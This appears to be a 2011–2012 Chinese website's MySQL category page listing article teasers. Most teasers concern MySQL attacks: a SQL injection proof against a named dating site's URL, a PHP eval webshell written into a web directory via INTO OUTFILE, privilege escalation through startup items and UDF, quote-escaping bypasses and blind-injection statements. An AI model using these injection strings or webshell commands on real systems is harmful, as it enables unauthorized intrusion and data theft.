MySql-MySql语句-MySql数据库-MySql查询

    黑客笑雅虎服务器漏洞太多 窃走45.3万份用户信息

    时间:2012-07-12 浏览:19 类别:威胁 

    7月12日消息,据国外媒体报道,目前黑客们公布的类似用户登陆账号的认证信息至少有453万份,黑客们称,他们检索了来自雅虎一些未识别的服务器上的资料,之后便得到了这些信息。目前,这些信息已在由黑客联盟组成...[详情]

    受管制的色情网站究竟有多大? [1][2]

    时间:2012-04-10 浏览:1448 类别:业界 

    受管制的色情网站究竟有多大? 色情网站需要提供数千个动态的、可搜索的视频数据库,当有人点击一个视频时,文件会经过硬盘读取继而上传到网络上,这是一个繁杂的过程,而CPU周 期和I/O能够影响数据的读取和上传的快慢。除此之外,在硬件方面,...[详情]

    突破伪静态的四种注入方法 [1][2]

    时间:2012-03-14 浏览:3184 类别:防护 

    伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.badguest.cn/p...[详情]

    世纪佳缘mysql注入及修复

    时间:2011-11-16 浏览:3189 类别:研究 [ mysql ]

    漏洞证明:http://diary.jiayuan.com/iframe/view.php?hid=66&view=1%20and%201=1http://diary.jiayuan.com/iframe/view.php?hid=66&view=1%20and%201=2修复方案:你懂的...[详情]

    Mysql root导shell

    时间:2011-11-16 浏览:3407 类别:技巧 [ mysql ]

    Mysql导shellSelect <?php eval($_POST[cmd]);?> into outfile E:/wwwroot/china/eval.php;//导shell,访问报错,详情不解select load_file(E:/wwwroot/china/eval.php);//读shell,检查shell完整性http...[详情]

    注射攻击可利用变量整理 [1][2]

    时间:2011-10-22 浏览:481 类别:防护 

    当我们注射mysql库的输入点的时候,可以通过version()/user()/database()/password()等内置函数来得到mysql的相关信息,其实我们在注射的时候可以利用mysql内置的变量来得到更多的mysql信息  其中version()可以...[详情]

    root用户提权之mysql写入启动项提权

    时间:2011-10-22 浏览:272 类别:防护 [ mysql ]

    实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 C:\\Documents and Set...[详情]

    双字节编码绕PHP单引号转义又一例: SQL UPDATE注入

    时间:2011-10-22 浏览:430 类别:防护 

    原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。view plaincopy to clipboardprint?<?php// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect(localhost,root...[详情]

    关于MYSQL into outfile注射

    时间:2011-10-22 浏览:277 类别:研究 [ mysql ]

    其实网上已经有很多关于mysql注射的文章了~ 不过还是缺乏重点吧~ 要使用 into outfile 把代码写到web目录取得WEBSHELL首先需要 3大先天条件:①知道物理路径(into outfile 物理路径) 这样才能写对目录...[详情]

    PHP盲注常用语句

    时间:2011-10-22 浏览:589 类别:防护 

    整理了一些盲注语句,有时候搞站的时候用的着。希望对大家也有用,大牛小牛们用的着就尽管拿吧。判断版本号:http://www.baidu.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat...[详情]
  • 聚盟网|技盟中心|微盟中心|乐盟中心|站长联盟|聚盟家园|聚盟论坛|聚盟圈|站长吧|蛇年祝福短信
  • Copyright © 2010 juoooo.com. All Rights Reserved. 网站备案:粤ICP备10088885号